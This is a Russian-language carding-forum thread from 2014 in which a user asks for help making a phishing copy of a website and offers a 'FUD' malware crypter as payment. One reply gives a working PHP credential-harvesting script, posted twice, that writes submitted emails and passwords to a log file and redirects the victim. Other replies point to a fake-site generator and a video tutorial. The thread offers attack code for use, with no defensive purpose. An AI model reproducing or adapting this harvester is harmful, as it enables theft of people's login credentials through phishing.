1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Помогите сделать фейк сайта

Тема в разделе "Помощь по всем вопросам.", создана пользователем kkiinn6666, 2 янв 2014.

1. TopicStarter Overlay
    kkiinn6666

kkiinn6666 Гость

Доброе время суток ребята. Я ни как не могу сделайть фейк сайта Please login or register to view links тупо не приходят логи((( кто сможет помогите плиз в долгу не останусь... ( дам в замен криптор fud)

Метки:
  2. Nimik

Nimik

Симпатии:
    11
    Выделенная строка твоя)) вместо ссылки ставь свою базу, например base.php с таким же именем создаёшь текстовый документ, разширение php!!! ну и лог я не знаю какой ты придумаешь, можешь использовать этот <?PHP
    $Login = $_POST['email'];
    $Pass = $_POST['pass'];

$log = fopen("admin/123456.txt","a+");
    fwrite($log,"\n $Login:$Pass \n");
    fclose($log);
    header("Location: /poslan.php");
    ?> это с фейка подарков вытащен, переделаешь под себя)
    впринципе если ты раньше этого не делал то обьяснить тебе что то будет трудно)
    --- добавлено: 3 янв 2014 в 03:14 ---
    Выделенная строка твоя)) вместо ссылки ставь свою базу, например base.php с таким же именем создаёшь текстовый документ, разширение php!!! ну и лог я не знаю какой ты придумаешь, можешь использовать этот <?PHP
    $Login = $_POST['email'];
    $Pass = $_POST['pass'];

$log = fopen("admin/123456.txt","a+");
    fwrite($log,"\n $Login:$Pass \n");
    fclose($log);
    header("Location: /poslan.php");
    ?> это с фейка подарков вытащен, переделаешь под себя)
    впринципе если ты раньше этого не делал то обьяснить тебе что то будет трудно)

Вложения:

• Like Like x 1
  3. TopicStarter Overlay
    vostokrusi

vostokrusi Гость

Походу тс с фейками особо не дружит. С помощью arxwfakegen (вроде так называется) создай фейк

4. nitob

nitob

Симпатии:
    29
    Вот видос 2 минуты и фейк готов

Поделиться этой страницей

Загрузка...